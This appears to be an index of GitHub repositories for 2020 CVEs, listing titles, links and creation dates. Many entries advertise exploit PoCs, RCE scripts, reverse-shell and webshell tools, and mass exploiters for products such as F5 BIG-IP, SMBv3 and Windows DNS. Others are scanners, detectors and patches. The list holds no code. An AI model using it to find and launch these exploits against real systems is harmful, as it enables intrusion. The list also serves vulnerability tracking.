**Information regarding CVE-2020-9008** : [kyletimmermans/blackboard-xss](https://api.github.com/repos/kyletimmermans/blackboard-xss) create time: 2020-02-17T00:07:34Z

**None** : [rmkn/cve-2020-8617](https://api.github.com/repos/rmkn/cve-2020-8617) create time: 2020-05-22T05:40:55Z

**saltstack CVE-2020-11652 ** : [fanjq99/CVE-2020-11652](https://api.github.com/repos/fanjq99/CVE-2020-11652) create time: 2020-05-22T07:56:32Z

**how detect CVE-2020-2551 poc exploit python Weblogic RCE with IIOP** : [hktalent/CVE-2020-2551](https://api.github.com/repos/hktalent/CVE-2020-2551) create time: 2020-01-19T13:01:32Z

**Cisco AnyConnect < 4.8.02042 privilege escalation through path traversal** : [goichot/CVE-2020-3153](https://api.github.com/repos/goichot/CVE-2020-3153) create time: 2020-05-19T18:59:26Z

**CVE-2020-2551 POC to use in Internet** : [Dido1960/Weblogic-CVE-2020-2551-To-Internet](https://api.github.com/repos/Dido1960/Weblogic-CVE-2020-2551-To-Internet) create time: 2020-05-24T02:56:12Z

**CVE-2020-10199 Nexus <= 3.21.1 远程代码执行脚本(有回显)** : [zhzyker/CVE-2020-10199_POC-EXP](https://api.github.com/repos/zhzyker/CVE-2020-10199_POC-EXP) create time: 2020-04-16T09:40:15Z

**Nexus 3 越权漏洞利用脚本** : [zhzyker/CVE-2020-11444](https://api.github.com/repos/zhzyker/CVE-2020-11444) create time: 2020-05-27T07:03:59Z

**CVE-2020-10204 远程命令执行脚本** : [zhzyker/CVE-2020-10204](https://api.github.com/repos/zhzyker/CVE-2020-10204) create time: 2020-05-27T06:55:54Z

**None** : [CrackerCat/CVE-2020-11492](https://api.github.com/repos/CrackerCat/CVE-2020-11492) create time: 2020-05-28T04:32:01Z

**None** : [halsten/CVE-2020-0796](https://api.github.com/repos/halsten/CVE-2020-0796) create time: 2020-05-28T08:41:12Z

**None** : [HexChristmas/CVE-2020-1947](https://api.github.com/repos/HexChristmas/CVE-2020-1947) create time: 2020-05-29T08:07:16Z

**CVE-2020-13457** : [alt3kx/CVE-2020-13457](https://api.github.com/repos/alt3kx/CVE-2020-13457) create time: 2020-06-01T13:27:11Z

**None** : [fengjixuchui/CVE-2020-11493](https://api.github.com/repos/fengjixuchui/CVE-2020-11493) create time: 2020-06-13T05:26:11Z

**A proof-of-concept for CVE-2020-12753** : [shinyquagsire23/CVE-2020-12753-PoC](https://api.github.com/repos/shinyquagsire23/CVE-2020-12753-PoC) create time: 2020-06-01T21:58:42Z

**PoC exploit for VMware Cloud Director RCE (CVE-2020-3956)** : [aaronsvk/CVE-2020-3956](https://api.github.com/repos/aaronsvk/CVE-2020-3956) create time: 2020-06-01T18:26:32Z

**CVE-2020-0796** : [ysyyrps123/CVE-2020-0796](https://api.github.com/repos/ysyyrps123/CVE-2020-0796) create time: 2020-06-02T12:04:30Z

**CVE-2020-0668** : [Nan3r/CVE-2020-0668](https://api.github.com/repos/Nan3r/CVE-2020-0668) create time: 2020-02-26T11:37:29Z

**None** : [haneline/cve2020](https://api.github.com/repos/haneline/cve2020) create time: 2020-06-02T14:55:22Z

**None** : [84KaliPleXon3/CVE-2020-12078](https://api.github.com/repos/84KaliPleXon3/CVE-2020-12078) create time: 2020-06-02T17:44:07Z

**CVE-2020-5410** : [dead5nd/config-demo](https://api.github.com/repos/dead5nd/config-demo) create time: 2020-06-03T02:52:09Z

**批量测试CVE-2020-0796 - SMBv3 RCE** : [1060275195/SMBGhost](https://api.github.com/repos/1060275195/SMBGhost) create time: 2020-06-11T06:24:30Z

**None** : [asc0t6e/CVE-2020-0708](https://api.github.com/repos/asc0t6e/CVE-2020-0708) create time: 2020-06-03T04:26:24Z

**CVE-2020_0796-exp** : [RonnieNiu/CVE-2020_0796-exp](https://api.github.com/repos/RonnieNiu/CVE-2020_0796-exp) create time: 2020-06-03T04:58:45Z

**None** : [ericzhong2010/GUI-Check-CVE-2020-0976](https://api.github.com/repos/ericzhong2010/GUI-Check-CVE-2020-0976) create time: 2020-03-14T07:59:28Z

**for Ubuntu 18.04, improve functions.** : [qerogram/CVE-2020-9484](https://api.github.com/repos/qerogram/CVE-2020-9484) create time: 2020-06-04T14:19:12Z

**jackson jndi injection** : [Blyth0He/CVE-2020-8840](https://api.github.com/repos/Blyth0He/CVE-2020-8840) create time: 2020-06-05T02:05:15Z

**None** : [wyu0hop/CVE-2020-0096](https://api.github.com/repos/wyu0hop/CVE-2020-0096) create time: 2020-06-05T08:26:27Z

**PoC RCE Reverse Shell for CVE-2020-0796 (SMBGhost)** : [thelostworldFree/CVE-2020-0796](https://api.github.com/repos/thelostworldFree/CVE-2020-0796) create time: 2020-04-22T09:09:02Z

**CVE-2020-9484 Mass Scanner, Scan a list of urls for Apache Tomcat deserialization (CVE-2020-9484) which could lead to RCE ** : [osamahamad/CVE-2020-9484-Mass-Scan](https://api.github.com/repos/osamahamad/CVE-2020-9484-Mass-Scan) create time: 2020-06-05T20:40:28Z

**CVE 2020-10135 a.k.a BIAS (Bluetooth Impersonation Attack)** : [marcinguy/CVE-2020-10135-BIAS](https://api.github.com/repos/marcinguy/CVE-2020-10135-BIAS) create time: 2020-06-01T07:36:37Z

**Vulnerability demonstration for Django CVE-2020-13254** : [danpalmer/django-cve-2020-13254](https://api.github.com/repos/danpalmer/django-cve-2020-13254) create time: 2020-06-07T16:42:33Z

**Manually Reverted SimpleFileList 1.7 plugin for Wordpress to explore CVE-2020-12832** : [0x05010705/simplefilelist1.7](https://api.github.com/repos/0x05010705/simplefilelist1.7) create time: 2020-06-07T23:57:08Z

**Exploit for CVE-2020-9283 based on Go ** : [brompwnie/CVE-2020-9283](https://api.github.com/repos/brompwnie/CVE-2020-9283) create time: 2020-06-02T10:55:37Z

**CVE-2020-8103 Link Resolution Privilege Escalation Vulnerability in Bitdefender Antivirus Free** : [RedyOpsResearchLabs/-CVE-2020-8103-Bitdefender-Antivirus-Free-EoP](https://api.github.com/repos/RedyOpsResearchLabs/-CVE-2020-8103-Bitdefender-Antivirus-Free-EoP) create time: 2020-04-03T07:57:53Z

**Proof of Concept for CVE-2020-10759 (fwupd signature validation bypass)** : [justinsteven/CVE-2020-10759-poc](https://api.github.com/repos/justinsteven/CVE-2020-10759-poc) create time: 2020-06-06T04:44:38Z

**适配12.2.1.3和12.2.1.4版本** : [ZZZWD/CVE-2020-2883](https://api.github.com/repos/ZZZWD/CVE-2020-2883) create time: 2020-06-09T05:23:11Z

**SMBv3 Ghost (CVE-2020-0796) Vulnerability** : [exp-sky/CVE-2020-0796](https://api.github.com/repos/exp-sky/CVE-2020-0796) create time: 2020-06-09T06:18:54Z

**Bluetooth Impersonation AttackS (BIAS) [CVE 2020-10135]** : [francozappa/bias](https://api.github.com/repos/francozappa/bias) create time: 2020-05-18T18:57:29Z

**CVE-2020-13889. The admin page of bludit have an XSS in the showAlert() function that dont sanitize user input leading them to execute an malicious code.** : [gh0st56/CVE-2020-13889](https://api.github.com/repos/gh0st56/CVE-2020-13889) create time: 2020-06-04T21:35:22Z

**CVE-2020-1206 Uninitialized Kernel Memory Read POC** : [ZecOps/CVE-2020-1206-POC](https://api.github.com/repos/ZecOps/CVE-2020-1206-POC) create time: 2020-04-05T15:52:43Z

**CVE-2020-0796 Remote Code Execution POC** : [ZecOps/CVE-2020-0796-RCE-POC](https://api.github.com/repos/ZecOps/CVE-2020-0796-RCE-POC) create time: 2020-04-20T14:35:48Z

**Zeek script to detect servers vulnerable to CVE-2020-13777** : [0xxon/cve-2020-13777](https://api.github.com/repos/0xxon/cve-2020-13777) create time: 2020-06-09T01:11:10Z

**A smol bash script I threw together pretty quickly to scan for vulnerable versions of the Apache Tomcat RCE. I'll give it some love when I have the time. ** : [DeviantSec/CVE-2020-9484-Scanner](https://api.github.com/repos/DeviantSec/CVE-2020-9484-Scanner) create time: 2020-06-09T04:13:51Z

**None** : [P1kAju/CVE-2020-1301](https://api.github.com/repos/P1kAju/CVE-2020-1301) create time: 2020-06-10T08:21:53Z

**CVE-2020-2546,CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3 payload exploit poc python3,** : [hktalent/CVE_2020_2546](https://api.github.com/repos/hktalent/CVE_2020_2546) create time: 2020-03-02T15:54:46Z

**CVE-2020-10749 PoC (Kubernetes MitM attacks via IPv6 rogue router advertisements)** : [knqyf263/CVE-2020-10749](https://api.github.com/repos/knqyf263/CVE-2020-10749) create time: 2020-06-11T15:42:18Z

**CVE 2020-6096 PoC** : [KashaMalaga/cve2020-6096](https://api.github.com/repos/KashaMalaga/cve2020-6096) create time: 2020-06-11T16:21:38Z

**test** : [SnipJoe/CVE-2020-8888](https://api.github.com/repos/SnipJoe/CVE-2020-8888) create time: 2020-06-12T02:37:26Z

**Challange CVE-2020-13777 ** : [shigeki/challenge_CVE-2020-13777](https://api.github.com/repos/shigeki/challenge_CVE-2020-13777) create time: 2020-06-12T12:54:00Z

**for 供養** : [Goyotan/CVE-2020-6418-PoC](https://api.github.com/repos/Goyotan/CVE-2020-6418-PoC) create time: 2020-06-13T07:32:24Z

**Citrix Workspace app before 1912 for Windows - Privilege Escalation #1** : [hessandrew/CVE-2020-13885](https://api.github.com/repos/hessandrew/CVE-2020-13885) create time: 2020-06-07T14:49:46Z

**Citrix Workspace app before 1912 for Windows - Privilege Escalation #2** : [hessandrew/CVE-2020-13884](https://api.github.com/repos/hessandrew/CVE-2020-13884) create time: 2020-06-07T15:00:03Z

**POC exploit for SMBLost vulnerability (CVE-2020-1301)** : [shubham0d/CVE-2020-1301](https://api.github.com/repos/shubham0d/CVE-2020-1301) create time: 2020-06-13T18:24:26Z

**None** : [joshfinley/CVE-2020-11492](https://api.github.com/repos/joshfinley/CVE-2020-11492) create time: 2020-05-27T18:11:18Z

**Description and public exploit for CVE-2020-12712** : [SanderUbink/CVE-2020-12712](https://api.github.com/repos/SanderUbink/CVE-2020-12712) create time: 2020-06-15T08:32:08Z

**A PoC for CVE-2020-8816 that does not use $PATH but $PWD and globbing** : [MartinSohn/CVE-2020-8816](https://api.github.com/repos/MartinSohn/CVE-2020-8816) create time: 2020-06-15T18:24:19Z

**来源于jackson-CVE-2020-8840,需要开autotype** : [Wfzsec/FastJson1.2.62-RCE](https://api.github.com/repos/Wfzsec/FastJson1.2.62-RCE) create time: 2020-02-23T03:51:40Z

**Exploit Code for CVE-2020-1283 - Windows-Denial-of-Service-Vulnerability** : [RedyOpsResearchLabs/CVE-2020-1283_Windows-Denial-of-Service-Vulnerability](https://api.github.com/repos/RedyOpsResearchLabs/CVE-2020-1283_Windows-Denial-of-Service-Vulnerability) create time: 2020-04-17T09:21:36Z

**POC Script for CVE-2020-12800: RCE through Unrestricted File Type Upload ** : [amartinsec/CVE-2020-12800](https://api.github.com/repos/amartinsec/CVE-2020-12800) create time: 2020-05-15T01:50:36Z

**CVE-2020-5410 Spring Cloud Config directory traversal vulnerability** : [osamahamad/CVE-2020-5410-POC](https://api.github.com/repos/osamahamad/CVE-2020-5410-POC) create time: 2020-06-16T20:15:58Z

**CVE-2020-1066-EXP支持Windows 7和Windows Server 2008 R2操作系统** : [cbwang505/CVE-2020-1066-EXP](https://api.github.com/repos/cbwang505/CVE-2020-1066-EXP) create time: 2020-06-01T04:44:05Z

**Vulnerability checker for Callstranger (CVE-2020-12695)** : [yunuscadirci/CallStranger](https://api.github.com/repos/yunuscadirci/CallStranger) create time: 2020-06-08T07:37:49Z

**None** : [Sentinel-One/CVE-2020-9332](https://api.github.com/repos/Sentinel-One/CVE-2020-9332) create time: 2020-05-05T08:06:05Z

**LPE for CVE-2020-1054 targeting Windows 7 x64** : [0xeb-bp/cve-2020-1054](https://api.github.com/repos/0xeb-bp/cve-2020-1054) create time: 2020-06-16T23:22:15Z

**PoC of StrandHogg2 (CVE-2020-0096)** : [liuyun201990/StrandHogg2](https://api.github.com/repos/liuyun201990/StrandHogg2) create time: 2020-06-23T05:43:15Z

**cve-2020-0688** : [Ridter/cve-2020-0688](https://api.github.com/repos/Ridter/cve-2020-0688) create time: 2020-02-27T02:54:27Z

**This is an implementation of the CVE-2020-0796 aka SMBGhost vulnerability, compatible with the Metasploit Framework** : [Almorabea/SMBGhost-LPE-Metasploit-Module](https://api.github.com/repos/Almorabea/SMBGhost-LPE-Metasploit-Module) create time: 2020-06-19T20:38:11Z

**None** : [shacojx/LifeRCEJsonWSTool-POC-CVE-2020-7961-Gui](https://api.github.com/repos/shacojx/LifeRCEJsonWSTool-POC-CVE-2020-7961-Gui) create time: 2020-06-23T03:01:57Z

**CVE-2020-13158 - Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal ** : [InfoSec4Fun/CVE-2020-13158](https://api.github.com/repos/InfoSec4Fun/CVE-2020-13158) create time: 2020-06-19T15:28:54Z

**CVE-2020-13159 - Artica Proxy before 4.30.000000 Community Edition allows OS command injection.** : [InfoSec4Fun/CVE-2020-13159](https://api.github.com/repos/InfoSec4Fun/CVE-2020-13159) create time: 2020-06-19T15:43:19Z

**cve2020-8835 PoC armv7** : [KashaMalaga/cve2020-8835](https://api.github.com/repos/KashaMalaga/cve2020-8835) create time: 2020-06-24T15:56:34Z

**POC for CVE-2020-10665 Docker Desktop Local Privilege Escalation** : [spaceraccoon/CVE-2020-10665](https://api.github.com/repos/spaceraccoon/CVE-2020-10665) create time: 2020-06-25T07:35:29Z

**POC exploit code for CVE-2020-1048(PrintDemon)** : [shubham0d/CVE-2020-1048](https://api.github.com/repos/shubham0d/CVE-2020-1048) create time: 2020-06-23T18:45:24Z

**A bluetooth-related vulnerability in some contact tracing apps** : [alwentiu/COVIDSafe-CVE-2020-12856](https://api.github.com/repos/alwentiu/COVIDSafe-CVE-2020-12856) create time: 2020-05-15T00:18:03Z

**None** : [ctlyz123/CVE-2020-1948](https://api.github.com/repos/ctlyz123/CVE-2020-1948) create time: 2020-06-27T10:47:22Z

**None** : [mooneee/CVE-2020-0121](https://api.github.com/repos/mooneee/CVE-2020-0121) create time: 2020-06-28T00:26:58Z

**CVE-2020-2551** : [0nise/CVE-2020-2551](https://api.github.com/repos/0nise/CVE-2020-2551) create time: 2020-02-24T02:36:46Z

**CVE-2020-12828 PoC and Analysis. ** : [0xsha/ZombieVPN](https://api.github.com/repos/0xsha/ZombieVPN) create time: 2020-06-30T15:18:58Z

**None** : [M3g4Byt3/cve-2020-1948-poc](https://api.github.com/repos/M3g4Byt3/cve-2020-1948-poc) create time: 2020-07-09T02:27:54Z

**The official exploit for OCS Inventory NG v2.7 Remote Command Execution CVE-2020-14947** : [mhaskar/CVE-2020-14947](https://api.github.com/repos/mhaskar/CVE-2020-14947) create time: 2020-07-02T16:40:52Z

**Apache Dubbo CVE-2020-1948 漏洞测试环境,亲测可用。** : [txrw/Dubbo-CVE-2020-1948](https://api.github.com/repos/txrw/Dubbo-CVE-2020-1948) create time: 2020-07-04T02:06:28Z

**None** : [Info-Security-Solution-Kolkata/CVE-2020-1206-Exploit](https://api.github.com/repos/Info-Security-Solution-Kolkata/CVE-2020-1206-Exploit) create time: 2020-07-04T05:54:58Z

**None** : [Info-Security-Solution-Kolkata/Smbleed-CVE-2020-1206-Exploit](https://api.github.com/repos/Info-Security-Solution-Kolkata/Smbleed-CVE-2020-1206-Exploit) create time: 2020-07-04T06:06:52Z

**CVE-2020-5902** : [dwisiswant0/CVE-2020-5902](https://api.github.com/repos/dwisiswant0/CVE-2020-5902) create time: 2020-07-04T14:12:57Z

**None** : [snappyJack/Rick_write_exp_CVE-2020-8835](https://api.github.com/repos/snappyJack/Rick_write_exp_CVE-2020-8835) create time: 2020-07-04T15:51:14Z

**None** : [prprhyt/PoC_TLS1_3_CVE-2020-13777](https://api.github.com/repos/prprhyt/PoC_TLS1_3_CVE-2020-13777) create time: 2020-06-21T11:55:40Z

**POC code for checking for this vulnerability. Since the code has been released, I decided to release this one as well. Patch Immediately!** : [ar0dd/CVE-2020-5902](https://api.github.com/repos/ar0dd/CVE-2020-5902) create time: 2020-07-05T16:38:36Z

**Scanning for Remote Desktop Gateways (Potentially unpatched CVE-2020-0609 and CVE-2020-0610)** : [2d4d/rdg_scanner_cve-2020-0609](https://api.github.com/repos/2d4d/rdg_scanner_cve-2020-0609) create time: 2020-01-21T21:33:17Z

**CVE-2020-13640 - SQL injection in wpDiscuz WordPress plugin <= 5.3.5** : [asterite3/CVE-2020-13640](https://api.github.com/repos/asterite3/CVE-2020-13640) create time: 2020-07-05T20:22:16Z

**None** : [nsflabs/CVE-2020-5902](https://api.github.com/repos/nsflabs/CVE-2020-5902) create time: 2020-07-05T20:16:07Z

**exploit code for F5-Big-IP (CVE-2020-5902)** : [yasserjanah/CVE-2020-5902](https://api.github.com/repos/yasserjanah/CVE-2020-5902) create time: 2020-07-06T01:12:23Z

**BIG-IP F5 Remote Code Execution** : [JSec1337/RCE-CVE-2020-5902](https://api.github.com/repos/JSec1337/RCE-CVE-2020-5902) create time: 2020-07-06T02:21:18Z

**CVE-2020-5902 scanner** : [cybersecurityworks553/scanner-CVE-2020-5902](https://api.github.com/repos/cybersecurityworks553/scanner-CVE-2020-5902) create time: 2020-07-06T06:58:29Z

**None** : [sv3nbeast/CVE-2020-5902_RCE](https://api.github.com/repos/sv3nbeast/CVE-2020-5902_RCE) create time: 2020-07-06T06:45:21Z

**dummy poc** : [qlkwej/poc-CVE-2020-5902](https://api.github.com/repos/qlkwej/poc-CVE-2020-5902) create time: 2020-07-06T10:36:07Z

**None** : [Zinkuth/F5-BIG-IP-CVE-2020-5902](https://api.github.com/repos/Zinkuth/F5-BIG-IP-CVE-2020-5902) create time: 2020-07-06T13:30:44Z

**Auth Bypass PoC for Kiali** : [jpts/cve-2020-1764-poc](https://api.github.com/repos/jpts/cve-2020-1764-poc) create time: 2020-07-06T13:59:52Z

**CVE-2020-5902** : [jinnywc/CVE-2020-5902](https://api.github.com/repos/jinnywc/CVE-2020-5902) create time: 2020-07-06T15:49:46Z

**None** : [rwincey/CVE-2020-5902-NSE](https://api.github.com/repos/rwincey/CVE-2020-5902-NSE) create time: 2020-07-05T17:51:38Z

**Proof of concept for CVE-2020-5902** : [yassineaboukir/CVE-2020-5902](https://api.github.com/repos/yassineaboukir/CVE-2020-5902) create time: 2020-07-05T17:01:27Z

**SMBGhost (CVE-2020-0796) and SMBleed (CVE-2020-1206) Scanner** : [ZecOps/SMBGhost-SMBleed-scanner](https://api.github.com/repos/ZecOps/SMBGhost-SMBleed-scanner) create time: 2020-07-06T14:45:07Z

**Patch F5 appliance CVE-2020-5902** : [GoodiesHQ/F5-Patch](https://api.github.com/repos/GoodiesHQ/F5-Patch) create time: 2020-07-06T19:07:33Z

**cve-2020-5902 POC exploit** : [r0ttenbeef/cve-2020-5902](https://api.github.com/repos/r0ttenbeef/cve-2020-5902) create time: 2020-07-06T05:11:37Z

**F5 BIG-IP Scanner (CVE-2020-5902)** : [jiansiting/CVE-2020-5902](https://api.github.com/repos/jiansiting/CVE-2020-5902) create time: 2020-07-07T02:03:39Z

**Fix CVE-2020-5902** : [wdlid/CVE-2020-5902-fix](https://api.github.com/repos/wdlid/CVE-2020-5902-fix) create time: 2020-07-07T03:16:02Z

**None** : [Any3ite/CVE-2020-5902-F5BIG](https://api.github.com/repos/Any3ite/CVE-2020-5902-F5BIG) create time: 2020-07-07T05:32:46Z

**Automated script for F5 BIG-IP scanner (CVE-2020-5902) using hosts retrieved from Shodan API.** : [aqhmal/CVE-2020-5902-Scanner](https://api.github.com/repos/aqhmal/CVE-2020-5902-Scanner) create time: 2020-07-05T06:19:09Z

**Scan from a given list for F5 BIG-IP and check for CVE-2020-5902** : [inho28/CVE-2020-5902-F5-BIGIP](https://api.github.com/repos/inho28/CVE-2020-5902-F5-BIGIP) create time: 2020-07-07T11:42:34Z

**Python script to check CVE-2020-5902 (F5 BIG-IP devices).** : [0xAbdullah/CVE-2020-5902](https://api.github.com/repos/0xAbdullah/CVE-2020-5902) create time: 2020-07-06T14:41:29Z

**F5 BIG-IP 任意文件读取+远程命令执行RCE** : [zhzyker/CVE-2020-5902](https://api.github.com/repos/zhzyker/CVE-2020-5902) create time: 2020-07-08T04:02:07Z

**CVE-2020-5902** : [ltvthang/CVE-2020-5903](https://api.github.com/repos/ltvthang/CVE-2020-5903) create time: 2020-08-25T02:07:41Z

**F5 mass scanner and CVE-2020-5902 checker** : [cristiano-corrado/f5_scanner](https://api.github.com/repos/cristiano-corrado/f5_scanner) create time: 2020-07-07T15:17:13Z

**None** : [k3nundrum/CVE-2020-5902](https://api.github.com/repos/k3nundrum/CVE-2020-5902) create time: 2020-07-07T11:31:31Z

**Proof of Concept for CVE-2020-5902** : [Un4gi/CVE-2020-5902](https://api.github.com/repos/Un4gi/CVE-2020-5902) create time: 2020-07-05T18:29:37Z

**A powershell script to check vulnerability CVE-2020-5902 of ip list** : [renanhsilva/checkvulnCVE20205902](https://api.github.com/repos/renanhsilva/checkvulnCVE20205902) create time: 2020-07-08T21:50:32Z

**POC** : [ajdumanhug/CVE-2020-5902](https://api.github.com/repos/ajdumanhug/CVE-2020-5902) create time: 2020-07-07T19:07:55Z

**Script para validar CVE-2020-5902 hecho en Go.** : [deepsecurity-pe/GoF5-CVE-2020-5902](https://api.github.com/repos/deepsecurity-pe/GoF5-CVE-2020-5902) create time: 2020-07-09T06:09:39Z

**None** : [Shu1L/CVE-2020-5902-fofa-scan](https://api.github.com/repos/Shu1L/CVE-2020-5902-fofa-scan) create time: 2020-07-09T07:44:07Z

**批量扫描CVE-2020-5902,远程代码执行,已测试** : [lijiaxing1997/CVE-2020-5902-POC-EXP](https://api.github.com/repos/lijiaxing1997/CVE-2020-5902-POC-EXP) create time: 2020-07-06T09:16:36Z

**Exploits for CVE-2020-9376 and CVE-2020-9377** : [renatoalencar/dlink-dir610-exploits](https://api.github.com/repos/renatoalencar/dlink-dir610-exploits) create time: 2020-07-09T22:48:51Z

**批量检测CVE-2020-5902** : [qiong-qi/CVE-2020-5902-POC](https://api.github.com/repos/qiong-qi/CVE-2020-5902-POC) create time: 2020-07-10T07:49:23Z

**PoC exploit of CVE-2020-11651 and CVE-2020-11652** : [jasperla/CVE-2020-11651-poc](https://api.github.com/repos/jasperla/CVE-2020-11651-poc) create time: 2020-05-04T11:52:28Z

**Checker CVE-2020-5902: BIG-IP versions 15.0.0 through 15.1.0.3, 14.1.0 through 14.1.2.5, 13.1.0 through 13.1.3.3, 12.1.0 through 12.1.5.1, and 11.6.1 through 11.6.5.1 suffer from Traffic Management User Interface (TMUI) arbitrary file read and command execution vulnerabilities.** : [MrCl0wnLab/checker-CVE-2020-5902](https://api.github.com/repos/MrCl0wnLab/checker-CVE-2020-5902) create time: 2020-07-10T07:00:35Z

**F5 BIG IP Scanner for CVE-2020-5902** : [halencarjunior/f5scan](https://api.github.com/repos/halencarjunior/f5scan) create time: 2020-07-08T21:57:37Z

**Citrix ADC Vulns** : [jas502n/CVE-2020-8193](https://api.github.com/repos/jas502n/CVE-2020-8193) create time: 2020-07-10T20:00:17Z

**Mass exploit for CVE-2020-5902** : [pwnhacker0x18/CVE-2020-5902-Mass](https://api.github.com/repos/pwnhacker0x18/CVE-2020-5902-Mass) create time: 2020-07-10T21:43:11Z

**It is a small script to fetch out the subdomains/ip vulnerable to CVE-2020-5902 written in bash** : [GovindPalakkal/EvilRip](https://api.github.com/repos/GovindPalakkal/EvilRip) create time: 2020-07-08T10:38:35Z

**F5 Big-IP CVE-2020-5902 mass exploiter/fuzzer.** : [d4rk007/F5-Big-IP-CVE-2020-5902-mass-exploiter](https://api.github.com/repos/d4rk007/F5-Big-IP-CVE-2020-5902-mass-exploiter) create time: 2020-07-09T08:34:37Z

**CVE-2020-5902** : [Al1ex/CVE-2020-5902](https://api.github.com/repos/Al1ex/CVE-2020-5902) create time: 2020-07-11T14:01:08Z

**CVE-2020-0796. Smbghost Local Privilege Escalation** : [5l1v3r1/smbghost-5](https://api.github.com/repos/5l1v3r1/smbghost-5) create time: 2020-07-14T03:49:09Z

**F5 BIG-IP RCE CVE-2020-5902 automatic check tool** : [theLSA/f5-bigip-rce-cve-2020-5902](https://api.github.com/repos/theLSA/f5-bigip-rce-cve-2020-5902) create time: 2020-07-10T15:33:00Z

**Citrix ADC从权限绕过到RCE** : [Airboi/Citrix-ADC-RCE-CVE-2020-8193](https://api.github.com/repos/Airboi/Citrix-ADC-RCE-CVE-2020-8193) create time: 2020-07-12T13:05:40Z

**None** : [momika233/cve-2020-5902](https://api.github.com/repos/momika233/cve-2020-5902) create time: 2020-07-12T14:37:25Z

**Scanning for CVE-2020-8193 - Auth Bypass check** : [PR3R00T/CVE-2020-8193-Citrix-Scanner](https://api.github.com/repos/PR3R00T/CVE-2020-8193-Citrix-Scanner) create time: 2020-07-13T10:36:43Z

**None** : [norrismw/CVE-2020-9047](https://api.github.com/repos/norrismw/CVE-2020-9047) create time: 2020-07-13T14:40:34Z

**None** : [RedyOpsResearchLabs/CVE-2020-7283-McAfee-Total-Protection-MTP-16.0.R26-EoP](https://api.github.com/repos/RedyOpsResearchLabs/CVE-2020-7283-McAfee-Total-Protection-MTP-16.0.R26-EoP) create time: 2020-04-07T11:17:27Z

**This Metasploit-Framework module can be use to help companies to check the last Citrix vulnerability CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 (disclosed July 08, 2020).** : [Zeop-CyberSec/citrix_adc_netscaler_lfi](https://api.github.com/repos/Zeop-CyberSec/citrix_adc_netscaler_lfi) create time: 2020-07-12T13:37:53Z

**CVE-2020-5902 BIG-IP** : [jas502n/CVE-2020-5902](https://api.github.com/repos/jas502n/CVE-2020-5902) create time: 2020-07-05T16:38:32Z

**CVE-2020-7693: SockJS 0.3.19 Denial of Service POC** : [andsnw/sockjs-dos-py](https://api.github.com/repos/andsnw/sockjs-dos-py) create time: 2020-07-03T11:04:48Z

**Bash Proof-of-Concept (PoC) script to exploit SIGRed (CVE-2020-1350). Achieves Domain Admin on Domain Controllers running Windows Server 2003 up to Windows Server 2019.** : [tinkersec/cve-2020-1350](https://api.github.com/repos/tinkersec/cve-2020-1350) create time: 2020-07-14T22:45:48Z

**None** : [ctlyz123/CVE-2020-8193](https://api.github.com/repos/ctlyz123/CVE-2020-8193) create time: 2020-07-15T14:43:03Z

**Windows registry mitigation response to CVE-2020-1350** : [jmaddington/dRMM-CVE-2020-1350-response](https://api.github.com/repos/jmaddington/dRMM-CVE-2020-1350-response) create time: 2020-07-15T19:43:39Z

**poc for cve-2020-0022** : [leommxj/cve-2020-0022](https://api.github.com/repos/leommxj/cve-2020-0022) create time: 2020-02-15T16:55:44Z

**Technical Write-Up on and PoC Exploit for CVE-2020-11519 and CVE-2020-11520** : [patois/winmagic_sd](https://api.github.com/repos/patois/winmagic_sd) create time: 2020-06-30T23:01:33Z

**cve-2020-0688 UNIVERSAL Python implementation utilizing ASPX webshell for command output** : [w4fz5uck5/cve-2020-0688-webshell-upload-technique](https://api.github.com/repos/w4fz5uck5/cve-2020-0688-webshell-upload-technique) create time: 2020-06-12T08:28:35Z

**None** : [dnerzker/CVE-2020-5902](https://api.github.com/repos/dnerzker/CVE-2020-5902) create time: 2020-07-08T16:22:53Z

**Denial of Service PoC for CVE-2020-1350 (SIGRed)** : [captainGeech42/CVE-2020-1350](https://api.github.com/repos/captainGeech42/CVE-2020-1350) create time: 2020-07-16T16:46:48Z

**writeup of CVE-2020-1362** : [Q4n/CVE-2020-1362](https://api.github.com/repos/Q4n/CVE-2020-1362) create time: 2020-07-17T07:35:05Z

**GUI** : [rockmelodies/CVE-2020-5902-rce-gui](https://api.github.com/repos/rockmelodies/CVE-2020-5902-rce-gui) create time: 2020-07-17T03:13:30Z

**A denial-of-service proof-of-concept for CVE-2020-1350** : [maxpl0it/CVE-2020-1350-DoS](https://api.github.com/repos/maxpl0it/CVE-2020-1350-DoS) create time: 2020-07-15T23:00:00Z

**None** : [nondejus/CVE-2020-14199](https://api.github.com/repos/nondejus/CVE-2020-14199) create time: 2020-07-17T13:48:01Z

**Disables AJP connectors to remediate CVE-2020-1938!** : [MateoSec/ghostcatch](https://api.github.com/repos/MateoSec/ghostcatch) create time: 2020-07-17T23:34:47Z

**This Powershell Script is checking if your server is vulnerable for the CVE-2020-1350 Remote Code Execution flaw in the Windows DNS Service** : [T13nn3s/CVE-2020-1350](https://api.github.com/repos/T13nn3s/CVE-2020-1350) create time: 2020-07-15T05:46:31Z

**Scanner and Mitigator for CVE 2020-1350** : [graph-inc/CVE-2020-1350](https://api.github.com/repos/graph-inc/CVE-2020-1350) create time: 2020-07-18T13:49:54Z

**Enviroment and exploit to rce test** : [h4ms1k/CVE-2020-8163](https://api.github.com/repos/h4ms1k/CVE-2020-8163) create time: 2020-07-18T18:42:23Z

**Fake exploit tool, designed to rickroll users attempting to actually exploit.** : [zoomerxsec/Fake_CVE-2020-1350](https://api.github.com/repos/zoomerxsec/Fake_CVE-2020-1350) create time: 2020-07-14T21:55:57Z

**None** : [Iamgublin/CVE-2020-1054](https://api.github.com/repos/Iamgublin/CVE-2020-1054) create time: 2020-07-19T08:20:57Z

**Detection of attempts to exploit Microsoft Windows DNS server via CVE-2020-1350 (AKA SIGRed)** : [corelight/SIGRed](https://api.github.com/repos/corelight/SIGRed) create time: 2020-07-15T05:55:20Z

**Weblogic CVE-2020-14645 UniversalExtractor JNDI injection getDatabaseMetaData()** : [Y4er/CVE-2020-14645](https://api.github.com/repos/Y4er/CVE-2020-14645) create time: 2020-07-20T03:27:24Z

**A basic proof of concept for CVE-2020-1350** : [Plazmaz/CVE-2020-1350-poc](https://api.github.com/repos/Plazmaz/CVE-2020-1350-poc) create time: 2020-07-20T03:44:58Z

